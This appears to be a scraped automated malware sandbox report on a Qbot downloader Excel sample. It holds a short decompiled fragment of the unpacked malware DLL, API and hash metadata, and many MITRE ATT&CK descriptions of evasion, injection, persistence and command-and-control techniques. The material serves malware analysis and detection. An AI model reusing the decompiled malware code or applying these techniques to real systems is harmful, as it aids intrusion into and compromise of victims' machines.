				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x164faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x164faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report #Qbot downloader

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "#Qbot downloader.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General

VBA Code

VBA File Name: Module5, Stream Size: 4241

General

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre